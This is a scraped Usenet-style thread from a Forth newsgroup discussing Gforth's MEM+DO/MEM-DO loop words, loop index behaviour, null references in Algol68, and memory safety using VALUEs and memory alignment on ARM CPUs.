start: 2 stop: -2 inc: 1 | 2 3 4 5 ... -6 -5 -4 -3
start: 2 stop: 2 inc: 1 | 2 3 4 5 ... -2 -1 0 1
start: 2 stop: 2 inc: -1 | 2
start: 2 stop: 2 inc: 0 | 2 2 2 2 2 ...
start: 0 stop: 0 inc: 0 | 0 0 0 0 0 ...
I still don't think 4tH's performance is perfect, but it's a tradeoff
between compatibility and intuitive behavior.
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time[..]
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
which is paired with LOOP. Both produce the same addresses (if ubytes
is a multiple of +nstride), but MEM-DO in reverse order.
.. NEXT and <FOR .. NEXT \ index N for 1-dim vectors
.. NEXT and <<FOR .. NEXT \ indices X Y for 2-dim arrays.
On 13/03/2024 9:00 pm, mhx wrote:
Anton Ertl wrote:
[..]
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time[..]
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
Interesting! It's always a nuisance when one wants to step backwards.
Does it work with UNLOOP and does one point at the start of the area or at the address of the first item to process?
Make one using BEGIN WHILE REPEAT. That's what Forth is for.
Anton Ertl wrote:
[..]
A recent addition to Gforth are MEM+DO and MEM-DO with the run-time
stack effect
MEM+DO ( addr ubytes +nstride -- R:loop-sys )[..]
MEM-DO ( addr ubytes +nstride -- R:loop-sys )
Interesting! It's always a nuisance when one wants to step backwards.
Does it work with UNLOOP
and does one point at the start of the area
or at the address of the first item to process?
So [Algol68] nil + reference takes the same place as NULL + pointer in c.
You are supposed to test for this case, but if you fail you get a "Segmentation fault". As far as Forth goes, that is pretty
satisfactory security.
albert@spenarnc.xs4all.nl writes:
So [Algol68] nil + reference takes the same place as NULL + pointer in c.
I'm unfamiliar with Algol68 but if every reference in it can be set to
nil, that sounds like the same error that Algol-W had. The alternative, >using an option value, means: 1) if the reference is not wrapped by an
option type, then it is guaranteed to not be null; 2) if it is wrapped
by an option type, then the compiler can stop you (or at least warn you)
if you try to dereference without first checking that it is non-null.
You are supposed to test for this case, but if you fail you get a
"Segmentation fault". As far as Forth goes, that is pretty
satisfactory security.
For sure, it is usually better to crash than to keep running and give >nonsense answers. Of course that usually requires a hardware fault on >dereferencing a null pointer, rather than giving whatever is at location
0 in memory like on unprotected machines.
Beyond not giving wrong answers, it's usually nice if your program
doesn't crash too often, especially from program bugs. Getting help
from the compiler for that is often useful.
Algol68 doesn't crash. It gives a run time error of the type
You can't get much help from the compiler for uninitialised references
like this. Either it crashes in the first run or it is insidious.
albert@spenarnc.xs4all.nl writes:
Algol68 doesn't crash. It gives a run time error of the type
Well that's what I mean by crashing. The program is terminated "involuntarily", or alternatively there is some way to catch the exception. Either way, the computation doesn't proceed.
You can't get much help from the compiler for uninitialised references
like this. Either it crashes in the first run or it is insidious.
No idea about Algol68 but in (at least some) other languages, the idea
of having references instead of pointers is that it is impossible to
create an uninitialised reference.
In Forth parlance: unless you're doing system programming where you
need it, don't use direct memory operations like @ ! MOVE, etc. This
also prohibits the use of VARIABLE. VARIABLES are uninitialized and
are accessed by @ !.
So I regularly use either xVALUEs (x means different data types) or data objects (for compound or dynamic types) with access methods. This results
in cleaner code and improves memory safety.
minforth@gmx.net (minforth) writes:
In Forth parlance: unless you're doing system programming where you
need it, don't use direct memory operations like @ ! MOVE, etc. This
also prohibits the use of VARIABLE. VARIABLES are uninitialized and
are accessed by @ !.
That helps but I'm sure there are other hazards. What do you do about arrays?
XZ14 (or TO XZ14) writes top matrix to array value XZ14et cetera
What about ALLOT or ALLOCATE?
At least in gforth, VARIABLEs are initialized to 0. That seems like a
good thing for implementations to do in general.
At least in gforth, VARIABLEs are initialized to 0. That seems like a
good thing for implementations to do ingeneral.
That's something I'd do for VALUEs should I move to omit the numeric
prefix at creation. By automatically initializing VALUEs with 0, I can pretend - if only to myself - that VALUEs are different from VARIABLEs.
Non-standard $VALUEs (for dynamic strings) or
DVALUEs/ZVALUEs can be very practical too.
minforth@gmx.net (minforth) writes:
Non-standard $VALUEs (for dynamic strings) or
DVALUEs/ZVALUEs can be very practical too.
2VALUE is standard.
Tristan Wibberley wrote:
Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.
You are still in for some nasty surprises with "public market" ARM CPUs. f.ex.
https://developer.arm.com/documentation/den0013/d/Porting/Alignment
On 05/03/2024 14:03, minforth wrote:
Tristan Wibberley wrote:
Or special purpose computers that are not mass marketed, but I wasn't
aware they'd fixed all the public market computers. Thanks for the info.
You are still in for some nasty surprises with "public market" ARM CPUs.
f.ex.
https://developer.arm.com/documentation/den0013/d/Porting/Alignment
And then we're not even trying to talk about what's in use and for sale
today but rather what will be in use over the next 6 decades. Most of
the historical peculiarities that are eliminated with more complex
hardware instead of longer software can be expected to be present at
some point during that period because more complex hardware is already a difficult problem for information security and I'd expect those
peculiarities wouldn't have been present if there weren't some
efficiency earned.
Sysop: | Keyop |
---|---|
Location: | Huddersfield, West Yorkshire, UK |
Users: | 475 |
Nodes: | 16 (2 / 14) |
Uptime: | 18:18:01 |
Calls: | 9,487 |
Calls today: | 6 |
Files: | 13,617 |
Messages: | 6,121,091 |